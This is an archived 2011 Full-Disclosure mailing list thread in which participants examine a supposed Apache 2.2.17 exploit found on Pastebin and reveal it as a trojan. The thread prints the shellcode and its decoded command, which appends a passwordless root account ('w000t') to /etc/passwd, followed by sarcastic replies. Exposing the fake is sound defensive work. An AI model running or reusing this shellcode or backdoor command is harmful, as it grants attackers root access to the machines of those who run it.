lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <CAExQ7uLV1Zb6QL9114WeLKbsRMPEw3Rf5Sho1UeUND4wt28RcQ@mail.gmail.com>
Date: Tue, 4 Oct 2011 22:38:08 -0500
From: adam <adam@...sy.net>
To: VeNoMouS <venom@...-x.co.nz>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Apache 2.2.17 exploit?

Yeah but the problem with China is that they're TOO dedicated, and all try
to log in at the same time to fix the problem, which ends up causing the
server to go down. It amazes me how big some of their hearts can be though.

On Tue, Oct 4, 2011 at 10:06 PM, VeNoMouS <venom@...-x.co.nz> wrote:

> **
>
> I dunno.... china offers usa that kind of support all the time ..... or so
> i heard....
>
> On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:
>
> Wow, I'm extremely impressed with the support that the developer of this
> exploit offers. I had been trying to get the exploit to work for about an
> hour or so (couldn't get root on the target) and noticed that the developer
> of this exploit logged into my machine (using an old account I must have set
> up a while ago named w000t). I couldn't believe it when I saw that he was
> logging in to fix the problem, I've NEVER gotten that kind of support even
> out of paid software. He's been logged in for a couple of hours now, and
> I've noticed that he's downloaded/uploaded quite a bit (probably downloading
> the log files and then uploading patches) so I'm just gonna wait it out. I
> definitely have a good feeling about this though.
>
> On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 <secn3t@...il.com> wrote:
>
>> yer it is clarly leet stuff dude...
>> i ran it and got liek 2000000000000000k2.2.* apache user bot  in a night!
>> :P
>> hgehe (jkin)
>> funny tho.
>> xd
>>
>>
>>  On 5 October 2011 13:09, VeNoMouS <venom@...-x.co.nz> wrote:
>>
>>>   char evil[] =
>>>                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46
>>> \x47\x89"
>>>                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e
>>> \x51\x89"
>>>                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd
>>> \x80\xe8"
>>>                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d
>>> \x63\x23"
>>>                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30
>>> \x30\x74"
>>>                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64
>>> \x65\x3a"
>>>                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61
>>> \x73\x68"
>>>                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73
>>> \x77\x64"
>>>                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43
>>> \x44\x44"
>>>                 "\x44\x44"
>>> .....
>>> execl("/bin/sh", "sh", "-c", evil, 0);
>>>
>>> .....
>>>
>>>
>>>
>>> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>>>
>>> AHUH.....
>>>
>>>
>>>
>>> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>>>
>>> I regularly trawl Pastebin.com to find code - often idiots leave some
>>> 0day and similar there and it is nice to find.
>>>
>>> Well, seeing as I have no test boxes at the moment, can someone check
>>> this code in a VM? I am not sure if it is legit or not.
>>>
>>> http://pastebin.com/ygByEV2e
>>>
>>> Thanks :)
>>>
>>> ~Darren
>>>
>>>
>>>
>>>    1. char evil[] =
>>>     2.                 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88
>>>    \x46\x47\x89"
>>>     3.                 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89
>>>    \x5e\x51\x89"
>>>     4.                 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55
>>>    \xcd\x80\xe8"
>>>     5.                 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23
>>>    \x2d\x63\x23"
>>>     6.                 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30
>>>    \x30\x30\x74"
>>>     7.                 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30
>>>    \x64\x65\x3a"
>>>     8.                 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62
>>>    \x61\x73\x68"
>>>     9.                 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73
>>>    \x73\x77\x64"
>>>     10.                 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43
>>>    \x43\x43\x44\x44"
>>>     11.                 "\x44\x44";
>>>
>>>
>>>  _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>>
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ